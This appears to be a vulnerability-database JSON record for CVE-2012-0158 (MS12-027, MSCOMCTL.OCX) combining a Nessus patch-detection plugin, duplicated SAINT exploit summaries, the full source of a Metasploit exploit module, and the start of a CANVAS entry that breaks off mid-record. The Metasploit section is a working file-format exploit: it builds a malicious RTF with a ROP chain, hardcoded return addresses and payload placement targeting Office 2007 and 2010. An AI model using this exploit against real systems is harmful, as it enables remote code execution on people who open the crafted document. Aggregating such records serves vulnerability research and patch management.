SP3 not reported\n }\n\n if (flag)\n {\n # KB923618 is Office 2003 SP3. KB2597112 will fail to install unless it's present, though it\n # doesn't make it clear that the failure is due to a lack of SP3\n prod_info +=\n '\\n\\nProduct : Office 2003 / Office 2003 Web components' +\n '\\nMissing update : KB2597112 (prerequisite: KB923618)';\n hotfix_add_report(bulletin:bulletin, kb:'2597112');\n }\n }\n if (office_version['12.0'] || owc2003_for_office2007_installed)\n {\n # If Office 2003 Web Components is ver. 12.x a different KB applies\n prod_info +=\n '\\n\\nProduct : Office 2007 / Office 2003 Web Components' +\n '\\nMissing update : KB2598041 (prerequisite: KB937961)';\n hotfix_add_report(bulletin:bulletin, kb:'2598041');\n }\n if (office_version['14.0'] && office_bitness != 'x64')\n {\n prod_info +=\n '\\n\\nProduct : Office 2010' +\n '\\nMissing update : KB2598039';\n hotfix_add_report(bulletin:bulletin, kb:'2598039');\n }\n if (vfp8_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 8.0' +\n '\\nMissing update : KB2647488';\n hotfix_add_report(bulletin:bulletin, kb:'2647488');\n }\n if (vfp9_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 9.0' +\n '\\nMissing update : KB2647490';\n hotfix_add_report(bulletin:bulletin, kb:'2647490');\n }\n if (vb6_installed)\n {\n # KB290887 is VB 6.0 Runtime SP6\n prod_info +=\n '\\n\\nProduct : Visual Basic 6.0 Runtime' +\n '\\nMissing update : KB2641426 (prerequisite: KB290887)';\n hotfix_add_report(bulletin:bulletin, kb:'2641426');\n }\n if ('2009 R2' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009 R2' +\n '\\nMissing update : KB2658676';\n hotfix_add_report(bulletin:bulletin, kb:'2658676');\n }\n else if ('2009' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009' +\n '\\nMissing update : KB2655547';\n hotfix_add_report(bulletin:bulletin, kb:'2655547');\n }\n if ('2007' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2007' +\n '\\nMissing update : KB2658677';\n hotfix_add_report(bulletin:bulletin, kb:'2658677');\n }\n if ('2002' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2002' +\n '\\nMissing update : KB2658674';\n hotfix_add_report(bulletin:bulletin, kb:'2658674');\n }\n if (max_index(biztalk_editions) > 0)\n {\n foreach biztalk_edition (biztalk_editions)\n {\n if ('2002' >< biztalk_edition)\n {\n prod_info +=\n '\\n\\nProduct : BizTalk Server 2002' +\n '\\nMissing update : KB2645025';\n hotfix_add_report(bulletin:bulletin, kb:'2645025');\n }\n }\n }\n}\n\n# the only other things to check are sql server 2000 and sql server 2000 analysis services.\n# if neither are installed and the activex stuff is not vulnerable, there's no need to do any further testing\nif (vuln == 0 && isnull(analysispath) && isnull(sql_ver_list)) exit(0, 'The host is not affected.');\n\nif (!is_accessible_share()) exit(1, 'is_accessible_share() failed.');\n\n# SQL Server 2000 Analysis Services\nif (\n analysispath &&\n hotfix_is_vulnerable(path:analysispath, file:\"Msmdadin.dll\", version:\"8.0.0.2302\", min_version:\"8.0.0.0\", bulletin:bulletin, kb:\"983807\")\n)\n{\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000 Analysis Services' +\n '\\nMissing update : KB983807';\n }\n}\n\nforeach item (keys(sql_ver_list))\n{\n item -= 'mssql/installs/';\n item -= '/SQLVersion';\n sqlpath = item;\n\n share = hotfix_path2share(path:sqlpath);\n if (!is_accessible_share(share:share)) continue;\n\n # SQL Server 2000\n # GDR\n if (hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2065.0\", min_version:\"2000.80.2000.0\", bulletin:bulletin, kb:\"983808\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983808';\n }\n }\n # QFE\n else if(hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2301.0\", min_version:\"2000.80.2100.0\", bulletin:bulletin, kb:\"983809\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983809';\n }\n }\n}\n\nif (vuln)\n{\n if (isnull(prod_info)) exit(0, \"None of the Microsoft KBs applies even though at least one of the controls is in use, possibly from a third-party application.\");\n\n if (!isnull(activex_report))\n {\n activex_report +=\n '\\n\\nNessus determined these controls are being used by the following applications :' +\n prod_info;\n\n if (hotfix_get_report())\n hotfix_add_report('\\n' + activex_report, bulletin:bulletin);\n else\n hotfix_add_report(activex_report, bulletin:bulletin);\n }\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "id": "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "id": "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-04-12T00:00:00", "published": "2012-04-12T00:00:00", "id": "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-03-19T18:07:10", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \"msgr3en.dll\", which will load after office got load, so the malicious file must be loaded through \"File / Open\" to achieve exploitation.\n", "modified": "2017-07-24T13:26:21", "published": "2012-04-23T20:59:25", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS12_027_MSCOMCTL_BOF", "href": "", "type": "metasploit", "title": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'juan vazquez', # Metasploit module\n 'sinn3r' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0158' ],\n [ 'OSVDB', '81125' ],\n [ 'BID', '52911' ],\n [ 'MSB', 'MS12-027' ],\n [ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500,\n 'Space' => 900,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true # no need\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # winword.exe v12.0.4518.1014 (No Service Pack)\n # winword.exe v12.0.6211.1000 (SP1)\n # winword.exe v12.0.6425.1000 (SP2)\n # winword.exe v12.0.6612.1000 (SP3)\n [ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English',\n {\n 'Offset' => 270,\n 'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45\n 'Rop' => false\n }\n ],\n # winword.exe v14.0.6024.1000 (SP1)\n [ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English',\n {\n 'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll\n 'Rop' => true,\n 'RopOffset' => 120\n }\n ],\n ],\n 'DisclosureDate' => 'Apr 10 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),\n ])\n end\n\n def stream(bytes)\n Rex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\")\n end\n\n def junk(n=1)\n tmp = []\n value = rand_text(4).unpack(\"L\")[0].to_i\n n.times { tmp << value }\n return tmp\n end\n\n # Ikazuchi ROP chain (msgr3en.dll)\n # Credits to Abysssec\n # http://abysssec.com/files/The_Arashi.pdf\n def create_rop_chain\n rop_gadgets = [\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F10115C, # HeapCreate() IAT = 3F10115C\n # EAX == HeapCreate() Address\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address.\n 0x3F39AFCF, # CALL EAX # RETN\n 0x00040000,\n 0x00010000,\n 0x00000000,\n 0x3F2CB9E0, # POP ECX # RETN\n 0x00008000, # pop 0x00008000 into ECX\n # add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap\n 0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN\n junk,\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address.\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)\n 0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN\n 0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN\n 0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\n # then we add ESP to the Zero which result in storing ESP into that address,\n # we need ESP address for copying shellcode ( which stores in Stack ),\n # and we have to get it dynamically at run-time, now with my tricky instruction, we have it!\n 0x3F2F18CC, # POP EAX # RETN\n 0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX\n # makes ECX point to nearly offset of Stack.\n 0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN\n 0x3F39795E, # POP EDX # RETN\n 0x00000024, # pop 0x00000024 into EDX\n # add 0x24 to ECX ( Stack address )\n 0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN\n junk,\n # EAX = ECX\n 0x3F398267, # MOV EAX,ECX # RETN\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,\n # and the popping it into ESI ! now ESI point where shellcode stores in stack\n 0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN\n # EAX = ECX\n 0x3F398267, # MOV EAX,ECX # RETN\n 0x3F2CB9E0, # POP ECX # RETN\n 0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n # makes EAX point to our RWX Heap\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # makes EDI = Our RWX Heap Address\n 0x3F2B0A7C, # XCHG EAX,EDI # RETN 4\n 0x3F2CB9E0, # POP ECX # RETN\n junk,\n 0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n # makes EAX point to our RWX Heap\n 0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN\n # just skip some junks\n 0x3F38BEFB, # ADD AL,58 # RETN\n 0x3F2CB9E0, # POP ECX # RETN\n 0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent )\n # Copy shellcode from stack into RWX Heap\n 0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN\n junk(2), # pop into edi # pop into esi\n 0x3F39AFCF # CALL EAX # RETN\n ].flatten.pack(\"V*\")\n\n # To avoid shellcode being corrupted in the stack before ret\n rop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here\n return rop_gadgets\n\n end\n\n def exploit\n\n ret_address = stream([target.ret].pack(\"V\"))\n\n if target['Rop']\n shellcode = stream(create_rop_chain)\n else\n # To avoid shellcode being corrupted in the stack before ret\n shellcode = stream(make_nops(target['Offset']))\n shellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string)\n shellcode << stream(make_nops(4))\n end\n shellcode << stream(payload.encoded)\n while shellcode.length < 2378\n shellcode += \"0\"\n end\n\n content = \"{\\\\rtf1\"\n content << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\"\n content << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\"\n content << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\"\n content << \"{\\\\object\\\\objocx\"\n content << \"{\\\\*\\\\objdata\"\n content << \"\\n\"\n content << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\"\n content << \"00000000000000000E0000\"\n content << \"\\n\"\n content << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\"\n content << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\"\n content << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\"\n content << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\"\n content << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\"\n content << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\"\n content << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\"\n content << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\"\n content << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\"\n content << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\"\n content << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\"\n content << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\n content << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\"\n content << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\"\n content << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\"\n content << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\"\n content << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\"\n content << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\"\n content << \"000000000000\"\n content << ret_address\n content << \"9090909090909090\"\n content << shellcode\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\n content << \"00000000000000\"\n content << \"\\n\"\n content << \"}\"\n content << \"}\"\n content << \"}\"\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(content)\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb"}], "canvas": [{"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "description": "**Name**| ms12_027 \n---|--- \n**CVE**| CVE-2012-0158 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-027 MSCOMCTL.OCX ActiveX Buffer Overflow \n**Notes**| CVE Name: CVE-2012-0158 \nVENDOR: Microsoft \nNotes: \n \nYou shoud manually start a Universal listener for this exploit. \nThe listener IP and PORT should be declared in the module configuration \ndialog. \n \nTested on: \n* Windows XP Professional SP3 English with Office 2010 Standard \n* 